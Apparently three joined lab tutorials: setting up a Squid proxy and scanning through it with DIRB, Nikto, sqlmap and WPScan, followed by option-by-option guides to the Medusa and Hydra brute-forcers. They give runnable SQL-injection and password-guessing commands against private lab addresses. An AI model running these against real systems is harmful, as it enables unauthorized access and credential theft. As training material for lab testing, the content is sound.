Web Proxy Penetration Lab Setup Testing using Squid

In this article we are going to setup Squid server to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.

Table of content

§  Introduction to Proxy Setting

§  Squid Proxy Installation

§  Squid Proxy Server Configuration

§  Configuring Apache service for Web Proxy

§  Set-up Manual Proxy in the Browser

§  Directory Brute force Attack on Proxy Server Using DIRB Tool

§  Vulnerability Scanning on Proxy Server Using Nikto Tool

§  SQL Injection on Proxy Server Using Sqlmap Tool

§  WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting

A proxy is a computer system or program which acts as a kind of middle-man that allow an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.

For Example: Two users say A and B has requested to access same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.

Squid Proxy Installation

Squid is a cross functional web proxy cache server application which offers proxy and cache services for HTTP, FTP, and other common network protocols such as proxying of Secure Sockets Layer (SSL) requests and caching of Domain Name Server (DNS) lookups, and implement transparent caching. Moreover it also maintains a wide variety of caching protocols.

Open the host file in your local machine to add localhost address and hostname, because by default squid3 search for Ubuntu as hostname for connection implementation.

Now use apt Repository to install squid3 and enter following command.

apt-get install squid3

Squid Proxy Server Configuration

Once it the installation completed, open its configuration file from the given path: /etc/squid3/squid.conf

With Squid's access control, you may possibly shape use of Internet services proxy by Squid to be accessible only employers with specific IP addresses.

Suppose you want to grant access by users of the 192.168.1.0/24 subnetwork only, then add the following line to the  ACL section of the squid.conf file:

acl lan src 192.168.1.0/24

Now give permission to your clients to access HTTP service over local network.

http_access allow lan

To set your Squid server to listen on the default TCP port 3128, change the http_port directive as such:

http_port 3128

Add following roles for squid after adding HTTP_Port

request_header_access Referer deny all

request_header_access X-Forwarded-For deny all

request_header_access Via deny all

request_header_access Cache-Control deny all

You can Set forwarded_for :-     on|off|transparent|truncate|delete

1.       If set to "on", Squid will append your client's IP address in the HTTP requests it forwards. By default it looks like:

X-Forwarded-For: 192.1.2.3

2.       If set to "off", it will appear as

X-Forwarded-For: unknown

3.       If set to "transparent", Squid will not alter the

X-Forwarded-For header in any way.

4.       If set to "delete", Squid will delete the entire

X-Forwarded-For header.

5.       If set to "truncate", Squid will remove all existing

Here we had set forwarded_for off and save the file, then use the following command to restart the Squid Proxy.

sudo service squid3 restart

Configuring Apache service for Web Proxy

Now open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement following rules on /html directory for localhost or Machine IP (192.168.1.103)

                Options Indexes FollowSymLinks MultiViews

                AllowOverride None

                Order deny,allow

                deny from all

        allow from 127.0.0.1 192.168.1.103

       

Now the save the file and restart the apache service with help of following command.

service apache2 start

Now when some try access http service of our network i.e. 192.168.1.103, he/she will welcome by following web page

“Error 403 Forbidden- You don’t have permission to access ”.

When you face such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind proxy server.

Set-up Manual Proxy in the Browser

Now to test whether our  proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter proxy server IP address (192.168.1.103) and Port (3128) to be used for all protocol.

BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.

Directory Brute force Attack on Proxy Server Using DIRB Tool

While making directory brute force attack via DIRB we can use –p option, it enables proxy URL to be used for all requests, by default it works on port 1080. As you have observe, on exploring target network IP in the web browser it put up “Access forbidden error” which means this web page is running behind some proxy.

dirb http://192.168.1.103

dirb http://192.168.1.103 –p 192.168.1.103:3128

From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any directory or file on executing 1st command where as in 2^nd command executed successfully.

Vulnerability Scanning on Proxy Server Using Nikto Tool

Similarly while scanning any network running behind proxy server, we can use -useproxy option to scan the vulnerability.

nikto -h 192.168.1.103

nikto -h 192.168.1.103 -useproxy http://192.168.1.103:3128

From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any result on executing 1st command where as in 2^nd command executed successfully.

SQL Injection on Proxy Server Using Sqlmap Tool

As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs

Hence we can use --proxy options to connect to the target URL, therefore execute following command:

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --proxy http://192.168.1.103:3128

Now from the given below image you can observe that we have successfully retrieve database name by exploiting SQL injection vulnerability.

WordPress Scanning on Proxy Server Using WPScan Tool

As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content

Hence we can use --proxy options to connect to the target URL, therefore execute the following command:

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content  --proxy http://192.168.1.103:3128

Hopefully, you have found this article very helpful and completely understood the working of Proxy server and other related topic cover in this article.

Comprehensive Guide on Medusa - A Brute Forcing Tool

Hello friends!! Today we are going to discuss - How much impactful Medusa is in cracking login credential of various protocols to make unauthorized access to a system remotely. In this article we have discussed each option available in Medusa to make brute force attack in various scenario. 

Table OF Content

Introduction to Medusa and its features

Password Cracking For Specific Username

Username Cracking for Specific Password

Cracking Login Credential

Making Brute Force Attack on Multiple Host

Attacking on Specific Port Instead of Default

NULL/Same as Login Attempt

Save logs to Disk

Stop on Success

Suppress Startup Banner

Verbose Mode

Error Debugging Mode

Using Combo Entries

Resuming the Brute Force Attack

Introduction to Medusa and its features

Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

§  Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.

§  Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.

§  Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

§  Multiple protocols supported. Many services are currently supported (e.g. SMB,  HTTP, POP3,  MS-SQL, SSHv2, among others)

Reference Source: http://www.foofus.net] 

Type "medusa" in the terminal without any options, it will dump all the available options it accepts along with their respective description.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]            : Target hostname or IP address

  -H [FILE]             : File containing target hostnames or IP addresses

  -u [TEXT]            : Username to test

  -U [FILE]             : File containing usernames to test

  -p [TEXT]            : Password to test

  -P [FILE]             : File containing passwords to test

  -C [FILE]             : File containing combo entries. See README for more information.

  -O [FILE]             : File to append log information to

  -e [n/s/ns]        : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]          : Name of the module to execute (without the .mod extension)

  -m [TEXT]          : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d                          : Dump all known modules

  -n [NUM]          : Use for non-default TCP port number

  -s                          : Enable SSL

  -g [NUM]           : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]           : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]          : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]           : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]           : Total number of logins to be tested concurrently

  -T [NUM]            : Total number of hosts to be tested concurrently

  -L                          : Parallelize logins using one username per thread. The default is to process

                 the entire username before proceeding.

  -f          : Stop scanning host after first valid username/password found.

  -F                          : Stop audit after first valid username/password found on any host.

  -b                          : Suppress startup banner

  -q                          : Display module's usage information

  -v [NUM]           : Verbose level [0 - 6 (more)]

  -w [NUM]         : Error debug level [0 - 10 (more)]

  -V                         : Display version

  -Z [TEXT]            : Resume scan based on map of previous scan

As said above medusa is a brute forcing tool and you can use -d option to identify all available modules it contains.

Password Cracking For Specific Username

Medusa is very impactful tool and also quit easy to use for making brute force attack on any protocol.

Assume you want to crack password for ftp (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.

At that moment you should go with following command where -u option enables username parameter and -P options enable dictionary for password list.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Username Cracking for Specific Password

Assume you want to crack username for ftp (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is vice-versa situation compare to above situation.

At that moment you should go with following command where -U option enables dictionary for username list and -p options enable password parameter.

medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Cracking Login Credential

Suppose you want to crack username and password for ftp (or any other), wish to make username and password brute force attack by using dictionary to guess the valid combination

At that moment you should go with following command where -U option enables dictionary for username list and - P options enables dictionary for password list.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Making Brute Force Attack on Multiple Host

If you want to use a user-pass dictionary on multiple host in a network then you can use -M option that enables the host list parameter and make brute force attack using same dictionary and will try same number of login attempt on each HOST IP mention in the host list.

Here you can observe I had saved two host IP in a text file and then use following command to make brute force attack on multiple host by using same dictionary.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp

As you can observe it has found 2 valid FTP logins on each Host.

If  you have multiple host IP in your host list and you want to make brute force attack only few number of host then use -T option for total number of hosts to be tested concurrently.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2

As you can observe from given below the 1^st command make brute force attack on single Host IP where as in 2^nd command it is making brute force attack on two host IP simultaneously.

Attacking on Specific Port Instead of Default

Due to security concern the network admin change the port number of a service on another port. Medusa makes brute force attack on default port of a service as you can observe in above all attacks it has automatically making attack on port 21 for ftp login.

But you can use -n option that enables specific port number parameter and launch the attack on mention port instead of default port number.

Suppose on scanning the target network I found SSH is running port 2222 instead of 22 therefore I will execute following command for ssh login attack.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222

As you can observe, in 1^st command of medusa it fail to connect on ssh as port 22 was close and it has found 1 valid password: 123 for username: raj for SSH login @ port 2222.

NULL/Same as Login Attempt

Using option -e along with ns enables three parameter null/same as login while making brute force attack on password field.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns

As you can observe with every username, it is trying to match the following combination along with the password list.

User “raj” and password “” as null password

User “raj” and password “raj” as same as login

Save logs to Disk

For the purpose of the record maintenance, better readability and future references, we save the output of the Medusa brute force attack onto a file. To this we will use the parameter -o of the medusa to save the output in a text file.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -o log.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root /log.txt.

Stop on Success 

Supoose while using host list you want to Stop brute force attack on host after first valid username/password found then you can use -f option alone with command.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f

Even you can use -F option to Stop audit after first valid username/password found on any host in your command.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F

Suppress Startup Banner

If you want to hide banner of medusa while making brute force attack then use -b option to Suppress startup banner.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b

Verbose Mode

There are six levels for verbose mode for examine the attack details and also contain error debug option that contain ten level for debug mode. You can use -v option for verbose parameter and -w option for error debugging parameter.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6

Error Debugging Mode

As said above there are level from 0-10 for examining brute force attack at each level, here you will observe the result of 0-6 is approx. same with little difference and result from of level 7-10 is approx. same but varied from 0-6 level.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 01

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 06

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 07

Debug mode is showing waittime, socket, send data size and received data size, module detail and path.

Using Combo Entries

Using -c option enables combo file parameter, the combo file should have one record per line and have the values colon separated in the format host_IP:username:password. If any of the three fields are left blank, the respective information should be delivered either as a global value or as a list in a file.

The following combinations are possible in the combo file:

    host:username:password

    host:username:

    host::-

    :username:password

    :username:

    ::password

    host::password

As you can observe in the given below image, we have userpass.txt file as our combo file format and we can use it along -C option to launch brute force attack.

medusa -M ftp -C userpass.txt

Resuming the Brute Force Attack

Sometime while making brute force, the attack get paused/halt or cancel accidently at this moment to save your time you can use -z option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from 1^st attempt.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

Now you can observe the output result from the given below image where after pressing ctrl C it stop the attack and then add the highlighted text in your command to resume the attack and continue it.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.

Repeat same as above, now compare the result after executing all three command you will notice it has continue the brute-forcing from the last dropped attempt

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.

Comprehensive Guide on Hydra - A Brute Forcing Tool

Hello friends!! Today we are going to discuss - How much impactful hydra is in cracking login credential of various protocols to make unauthorized access to a system remotely. In this article we have discussed each option available in hydra to make brute force attack in various scenario. 

Table of Content

§  Introduction to hydra

§  Multiple Feature of Hydra

§  Password Guessing For Specific Username

§  Username Guessing For Specific Password

§  Cracking Login Credential

§  Use Verbose or Debug Mode for Examining Brute Force

§  NULL/Same as Login/Reverse login Attempt

§  Save Output to Disk

§  Resuming The Brute Force Attack

§  Password Generating Using Various Set of Character

§  Attacking on Specific Port Instead of Default

§  Making Brute Force Attack on Multiple Host

Introduction to Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Multiple Feature of Hydra

Since we are using GNOME build of Kali Linux therefore the “thc-hydra” package is already included by default, all we need to do, open the terminal and just type “hydra -h” and press Enter. You will welcome by its help screen.

-R :                                         restore a previous aborted/crashed session

-I :                                           ignore an existing restore file.

-S :                                          perform an SSL connect

-s :                                          PORT   if the service is on a different default port, define it here

-l LOGIN or -L :                   FILE login with LOGIN name, or load several logins from FILE

-p PASS  or -P :                  FILE  try password PASS, or load several passwords from FILE

-x MIN:MAX:CHARSET : password bruteforce generation, type "-x -h" to get help

-e nsr :                                  try "n" null password, "s" login as pass and/or "r" reversed login

-u :                                         loop around users, not passwords (effective! implied with -x)

-C FILE :                                colon separated "login:pass" format, instead of -L/-P options

-M FILE :                               list of servers to be attacked in parallel, one entry per line

-o FILE :                                write found login/password pairs to FILE instead of stdout

-f / -F :                                  exit when a login/pass pair is found (-M: -f per host, -F global)

-t TASKS :                             run TASKS number of connects in parallel (per host, default: 16)

-w / -W TIME :                   wait time for responses (32s) / between connects per thread

-4 / -6 :                                  prefer IPv4 (default) or IPv6 addresses

-v / -V / -d :                         verbose mode / show login+pass for each attempt / debug mode

-U :                                         service module usage details

server :                                 the target server (use either this OR the -M option)

service :                               the service to crack (see below for supported protocols)

OPT :                                     some service modules support additional input (-U for module help)

Reference Source: https://tools.kali.org/password-attacks/hydra

Password Guessing For Specific Username

Hydra is very impactful tool and also quit easy to use for making brute force attack on any protocol.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]                                                                          

Suppose you want to crack password for ftp (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.

At that moment you should go with following command where -l option enables username parameter and -P options enable dictionary for password list.

hydra -l raj -P pass.txt 192.168.1.108 ftp

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Username Guessing For Specific Password

Suppose you want to crack username for ftp (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is vice-versa situation compare to above situation.

At that moment you should go with following command where -L option enables dictionary for username list and -P options enable password parameter.

hydra -L user.txt -p 123 192.168.1.108 ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Cracking Login Credential

Suppose you want to crack username and password for ftp (or any other), wish to make username and password brute force attack by using dictionary to guess the valid combination

At that moment you should go with following command where -L option enables dictionary for username list and - P options enables dictionary for password list.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Use Verbose or Debug Mode for Examining Brute Force

You can use -V option along with each command, with the help of verbose mode you can observe the each attempt for matching valid combination of username and password. If you will observe the given below image then you will find there are 5 username in user.txt file (L=5) and 5 passwords in pass.txt file (P=5) and hence the total number of login attempt will be 5*5=25.

Even you can use -d option that enables debug and verbose mode together and shows complete detail of attacking mode.

As you can observe the verbose mode is showing each attempt for matching valid credential for username and password with the help of user.txt and pass.txt as well as debug mode is showing waittime, conwait, socket, send pid and received pid

NULL/Same as Login/Reverse login Attempt

Using option -e along with nsr enables three parameter null/same as login/reverse login while making brute force attack on password field, if you will observe the given below image then you will notice that, this time L=5 and automatically P=8 which means now the total number of login tries will be 5*8=40.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr

As you can observe with every username, it is trying to match the following combination along with the password list.

Login “root” and pass “” as null password

Login “root” and pass “root” as same as login

Login “root” and pass “toor” as reverse of login

Save Output to Disk

For the purpose of the record maintenance, better readability and future references, we save the output of the hydra brute force attack onto a file. To this we will use the parameter -o of the hydra to save the output in a text file.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root /output.txt.

Resuming the Brute Force Attack

Sometime while making brute force, the attack get paused/halt or cancel accidently at this moment to save your time you can use -r option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from 1^st attempt.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp

hydra -R

Now you can observe the output result from the given below image where after pressing ctrl C it stop the attack and then type hydra -R to resume the attack and continue it.

Password Generating Using Various Set of Character

Hydra has -x option that enables password generation option that involves following instructions:

-x MIN:MAX:CHARSET

MIN is use to specify the minimum number of characters in the password

MAX is use to specify the maximum number of characters in the password

CHARSET is use to specify a specification of the characters to use in the generation valid CHARSET values are: 'a' for lowercase letters, 'A' for uppercase letters, '1' for numbers, and for all others, just add their real representation.

-y disable the use if the above letters as placeholders

Now suppose we want to try 123 as password for that I should set MIN=1, MAX=3 CHARSET 1 for generating numeric password for given username and run following command as said.

hydra -l shubham -x 1:3:1 ftp://192.168.1.108

or

hydra -l raj -x 1:3:1 192.168.1.108 ftp

hydra -l raj -x 1:3:1 192.168.1.108 ftp -y

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Now suppose we want to try 123 as password for that I should set MIN=1, MAX=3 CHARSET 1 for generating numeric password for given username and run following command as said.

hydra -l shubham -x 1:3:a ftp://192.168.1.108 -V

As you can observe it has found 1 valid password: abc for username: shubham for FTP login.

Attacking on Specific Port Instead of Default

Due to security concern the network admin change the port number of a service on another port. Hydra makes brute force attack on default port of a service as you can observe in above all attacks it has automatically making attack on port 21 for FTP login.

But you can use -s option that enables specific port number parameter and launch the attack on mention port instead of default port number.

Suppose on scanning the target network I found FTP is running port 2121 instead of 21 therefore I will execute following command for ftp login attack.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Making Brute Force Attack on Multiple Host

If you want to use a user-pass dictionary on multiple host in a network then you can use -M option that enables the host list parameter and make brute force attack using same dictionary and will try same number of login attempt on each HOST IP mention in the host list.

Here you can observe I had saved two host IP in a text file and then use following command to make brute force attack on multiple host by using same dictionary.

hydra -L user.txt -P pass.txt -M hosts.txt ftp

As you can observe it has found 2 valid FTP logins on each Host.

Suppose you had given a list of multiple targets and wish to finish the brute force attack as soon as it found valid login for any host IP, then you should use -F options which enable finish parameter when found valid credential for either host from inside the host list.

hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F

As you can observe it has found 1 valid FTP logins for 192.168.1.108 and finish the attack.

Disclaimer by Hydra - Please do not use in military or secret service organizations, or for illegal purposes.